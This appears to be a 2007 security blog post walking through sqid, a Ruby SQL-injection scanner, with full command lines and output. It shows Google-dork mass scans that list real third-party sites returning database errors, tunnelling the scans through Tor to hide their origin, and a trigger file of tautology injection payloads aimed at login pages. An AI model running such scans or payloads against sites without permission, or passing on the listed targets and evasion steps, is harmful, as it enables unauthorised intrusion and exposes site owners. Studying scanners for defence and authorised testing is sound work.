Saturday, July 14, 2007

Using sqid (SQL Injection Digger) to look for SQL Injection


SQL Injection Digger (sqid) is a command line Ruby program that looks for SQL injection and common database errors in websites. It works by swapping each query-string parameter's value for a trigger (a single quote by default) and matching the response against a database of known error signatures (sqid.db).
It can perform the following operations:
  • Look for SQL injection in a web page by extracting its links and testing their query parameters.
  • Submit forms in a web page to look for SQL injection.
  • Crawl a website to perform the above listed operations.
  • Perform a Google search for a query and look for SQL injection in the URLs found.
http://sqid.rubyforge.org/

Let's see it in action

sqid run with the help (-h) argument:

SegFault:~/sqid/sqid cg$ ruby sqid.rb -h
sqid v0.3 - SQL Injection digger.
Copyright (C) Metaeye Security Group - http://sqid.rubyforge.org

Usage: sqid.rb [options]

options:
-m, --mode MODE Operate in mode MODE.
MODE is one of
g,google Operate in google search mode.
u,url Check this url or a file with urls.
p,page Check single page.
c,crawl Crawl website and check.

Google search mode options:

-q, --query QUERY QUERY to perforn google search for.
-s, --start START zero-based index of the first desired result,
zero if not specified.
-r, --results RESULTS number of results desired, default is 20 if not specfied.
rounded to tens.

URL check mode options:
-u, --url URL check this URL.
If URL is a file urls will be loaded from this file, specify each url on a new line.

Page check mode options:

-p, --page PAGE Check this page.

Crawl mode options:
-c, --crawl WEBSITE Crawl website WEBSITE and check.
specify as http[s]://WESITE:[PORT], default PORT is 80

URL, Page and Crawl mode common options:
-C, --cookie COOKIE Cookie in the HTTP header specify as name=value,name=value.
If COOKIE is a file cookies will be loaded from this file, specify each cookie on a new line.

-a, --accept-cookies Accept cookies from the webite or page. Default is no.
-R, --referer REFERER Set referer in the HTTP header.
-B, --auth CREDENTIALS Use credentials as basic auth for the website.
specify as user:password.

Common options:

-o, --with-noquery Match page content without query parameters. Default is false.
-D, --db-files FILE,...,FILE Use file(s) FILE,...,FILE as signature database.
-t, --trigger TRIGGER Use TRIGGER for detecting SQL injections/errors default is '.
If TRIGGER is a file triggers will be loaded from it. specify each trigger on newline.

Lines starting with a # are ignored.

-T, --time-out TIMEOUT Timeout for response in seconds.
Default is 10 seconds.

-U, --user-agent USERAGENT User Agent in the HTTP Header. Default is SQID/0.3.
-P, --proxy PROXY User HTTP proxy PROXY for operations.
specfify as proxy:port.
-A, --proxy-auth CREDENTIALS Use crendtials CRENDENTIALS for the proxy.
specfify as user:password.

-v, --verbose Run verbosely.
-h, --help Show this message


Let's play with the google query:

SegFault:~/sqid/sqid cg$ ruby sqid.rb -m g -q inurl:page.asp -s 0 -r 50
sqid v0.3 - SQL Injection digger.
Copyright (C) Metaeye Security Group - http://sqid.rubyforge.org

[+] Getting 50 links from search inurl:page.asp starting from 0.
[+] Done got 50 links.
[*] Going to check 50 urls.

500 VBScript / ASP error => http://www.ddcf.org/page.asp?pageId='
500 MS-SQL Server error => http://www.unctad.org/Templates/Page.asp?intItemID='
500 MS-SQL Server error => http://www.aacp.org/site/page.asp?CID='&DID=3079
500 MS-SQL Server error => http://www.aacp.org/site/page.asp?CID=72&DID='
500 VBScript / ASP error => http://www.airweb.org/page.asp?page='
500 VBScript runtime error => http://www.airweb.org/page.asp?page='
Timed out => http://www.pebblebeach.com/page.asp?id='
500 VBScript / ASP error => http://www.royalsoc.ac.uk/page.asp?id='
500 VBScript runtime error => http://www.royalsoc.ac.uk/page.asp?id='
500 ADODB Error => http://www.yased.org.tr/page.asp?pageid='
500 VBScript / ASP error => http://www.neighbourhood.gov.uk/page.asp?id='
500 VBScript runtime error => http://www.neighbourhood.gov.uk/page.asp?id='
500 VBScript / ASP error => http://www.browsealoud.com/page.asp?pg_id='
500 VBScript runtime error => http://www.browsealoud.com/page.asp?pg_id='
[*] Warning: Client error 404 Page not found, http://policyresearch.gc.ca/page.asp?pagenm='.
500 VBScript runtime error => http://philanthropy.moodys.com/page.asp?template='&context=cmr&section=hglts
500 No match => http://philanthropy.moodys.com/page.asp?template=cmr&context='&section=hglts
Error getaddrinfo: No address associated with nodename, http://www.airindiaexpress.co.in/page.asp?pageid='.
500 VBScript runtime error => http://www.bscs.org/page.asp?pageid='&id=0%7Cevolution_programs
500 VBScript / ASP error => http://www.televue.com/engine/page.asp?cat='
500 VBScript runtime error => http://www.televue.com/engine/page.asp?cat='
500 MS-Access error => http://www.northernirelandscreen.co.uk/page.asp?id='
500 No match => http://www.airindia.com/page.asp?pageid='
500 MS-SQL Server error => http://www.seaair.info/page.asp?page='

[*] Checked 44 URLs.


A closer look at the query: sqid.rb -m g -q inurl:page.asp -s 0 -r 50

-m g  Google search mode
-q    query = "inurl:page.asp"
-s    start with result 0
-r    return 50 results (rounded to tens)

Note what sqid did with each hit: every query-string parameter was tested in turn (CID=' with DID left alone, then DID=' with CID left alone), and the label on the left is the sqid.db signature that matched the 500 response. "500 No match" means the server blew up but nothing in the body matched a known signature, so those are worth a manual look rather than being written off.

You can use sqid to check a single URL (-m u; -u also takes a file with one URL per line). The parameter's value, empty or not, gets replaced with the trigger:

SegFault:~/sqid/sqid cg$ ruby sqid.rb -m u -u http://www.site.info/page.asp?page=
sqid v0.3 - SQL Injection digger.
Copyright (C) Metaeye Security Group - http://sqid.rubyforge.org

[*] Going to check 1 urls.

500 MS-SQL Server error => http://www.site.info/page.asp?page='

[*] Checked 1 URLs.


You can use sqid to check a page (-m p): it fetches the page, pulls out the links, and tests the parameters of each one. The "Invalid URL" warning below is a link whose href started with a space (%20), which sqid skips rather than tests:

SegFault:~/sqid/sqid cg$ ruby sqid.rb -m p -p http://www.site.info/
sqid v0.3 - SQL Injection digger.
Copyright (C) Metaeye Security Group - http://sqid.rubyforge.org

[+] Getting links from page http://www.site.info/.
[*] Invalid URL: bad URI(is not URI?): %20http://www.site.org.za
[+] Done got 2 links.
[*] Going to check 2 urls.

500 MS-SQL Server error => http://www.site.info/page.asp?page='

[*] Checked 2 URLs.

You can use sqid to crawl a site as well:

SegFault:~/sqid/sqid cg$ ruby sqid.rb -v -m c -c http://www.carnal0wnage.com/
sqid v0.3 - SQL Injection digger.
Copyright (C) Metaeye Security Group - http://sqid.rubyforge.org

[v] Loaded 21 signatures from sqid.db.
[+] Crawling http://www.carnal0wnage.com/.
[v] Getting http://www.carnal0wnage.com/.
[v] Getting http://www.carnal0wnage.com/main.html.
[v] Getting http://www.carnal0wnage.com/papers.html.
[v] Getting http://www.carnal0wnage.com/hackvideos/index.html.
[v] Getting http://www.carnal0wnage.com/rootwars.html.
[v] Getting http://www.carnal0wnage.com/rootwars/Sept2nd2006_T1_RootWar_Shell_Logz.html.

[v] Getting http://www.carnal0wnage.com/rootwars/Sept2nd2006_T3_RootWar_Shell_Logz.html.
[v] Getting http://www.carnal0wnage.com/research.html.
[v] Getting http://www.carnal0wnage.com//research/PyDNSmap.py.
[v] Getting http://www.carnal0wnage.com/research/clearseclog.rb.
[v] Getting http://www.carnal0wnage.com/research/clearalllog.rb.
[v] Getting http://www.carnal0wnage.com/about.html.
[v] Getting http://www.carnal0wnage.com/links.html.
[v] Getting http://www.carnal0wnage.com//pvt/phackvideos.html.
[*] Warning: Client error 401 Authorization Required, http://www.carnal0wnage.com//pvt/phackvideos.html.
[+] Done got 32 links.
[*] Going to check 32 urls.

[v] Checking URL http://www.carnal0wnage.com/main.html.
[v] Checking URL http://www.carnal0wnage.com/papers.html.
[v] Checking URL http://www.carnal0wnage.com/hackvideos/index.html.
[v] Checking URL http://www.carnal0wnage.com/rootwars.html.
[v] Checking URL http://www.carnal0wnage.com/rootwars/Sept2nd2006_T1_RootWar_Shell_Logz.html.
[v] Checking URL http://www.carnal0wnage.com/rootwars/Sept2nd2006_T2_RootWar_Shell_Logz.html.
[v] Checking URL http://www.carnal0wnage.com/rootwars/Sept2nd2006_T3_RootWar_Shell_Logz.html.
[v] Checking URL http://www.carnal0wnage.com/research.html.
[v] Checking URL http://www.carnal0wnage.com//research/PyDNSmap.py.
[v] Checking URL http://www.carnal0wnage.com/research/clearseclog.rb.
[v] Checking URL http://www.carnal0wnage.com/research/clearalllog.rb.
[v] Checking URL http://www.carnal0wnage.com/about.html.
[v] Checking URL http://www.carnal0wnage.com/links.html.
[v] Checking URL http://www.carnal0wnage.com//pvt/phackvideos.html.

[*] Checked 32 URLs.

Tunnel that stuff through Tor. -P takes an HTTP proxy, not a SOCKS proxy, so point it at the Privoxy (or other HTTP-to-SOCKS) front end sitting in front of Tor, which listens on localhost:8118 in the standard setup, rather than at Tor's SOCKS port directly. Going through an HTTP proxy also means the proxy does the name resolution, not your box:

SegFault:~/sqid/sqid cg$ ruby sqid.rb -v -P localhost:8118 -m c -c http://www.carnal0wnage.com/
sqid v0.3 - SQL Injection digger.
Copyright (C) Metaeye Security Group - http://sqid.rubyforge.org

[v] Loaded 21 signatures from sqid.db.
[+] Crawling http://www.carnal0wnage.com/.
[v] Getting http://www.carnal0wnage.com/.
[v] Getting http://www.carnal0wnage.com/main.html.
[v] Getting http://www.carnal0wnage.com/papers.html.
[v] Getting http://www.carnal0wnage.com/hackvideos/index.html.
[v] Getting http://www.carnal0wnage.com/rootwars.html.
[v] Getting http://www.carnal0wnage.com/rootwars/Sept2nd2006_T1_RootWar_Shell_Logz.html.
---snip---

By default sqid only checks for SQL injection with a single quote (') as the trigger. You can supply your own trigger file with -t: one trigger per line, lines starting with # ignored. Every trigger is tried in each parameter in turn and URL-encoded on the way out (the spaces in the file show up as %20 in the tested URLs). The entries below close an open string and tack on a tautology, with and without a trailing SQL comment (--). Keep in mind the detection is still signature based: a payload only registers when the server answers with a recognizable error message, so a login that quietly succeeds on ' or '1 won't show up in this output.

adding a trigger file:
SegFault:~/sqid/sqid cg$ cat trigger2
'
' or '1
' or ' 1
' or '1--
' or ' 1--


SegFault:~/sqid/sqid cg$ ruby sqid.rb -P localhost:8118 -m g -q inurl:login.asp -t trigger2
sqid v0.3 - SQL Injection digger.
Copyright (C) Metaeye Security Group - http://sqid.rubyforge.org

[+] Getting 20 links from search inurl:login.asp starting from 0.
[+] Done got 20 links.
[*] Going to check 20 urls.

500 VBScript / ASP error => http://www.site2web.com/cgi-bin/login.asp?lid=0&il='
500 VBScript runtime error => http://www.site2web.com/cgi-bin/login.asp?lid=0&il='
500 VBScript / ASP error => http://www.site2web.com/cgi-bin/login.asp?lid=0&il='%20or%20'1
500 VBScript runtime error => http://www.site2web.com/cgi-bin/login.asp?lid=0&il='%20or%20'1
500 VBScript / ASP error => http://www.site2web.com/cgi-bin/login.asp?lid=0&il='%20or%20'%201
500 VBScript runtime error => http://www.site2web.com/cgi-bin/login.asp?lid=0&il='%20or%20'%201
500 VBScript / ASP error => http://www.site2web.com/cgi-bin/login.asp?lid=0&il='%20or%20'1--
500 VBScript runtime error => http://www.site2web.com/cgi-bin/login.asp?lid=0&il='%20or%20'1--
500 VBScript / ASP error => http://www.site2web.com/cgi-bin/login.asp?lid=0&il='%20or%20'%201--%20
500 VBScript runtime error => http://www.site2web.com/cgi-bin/login.asp?lid=0&il='%20or%20'%201--%20

----snip

-CG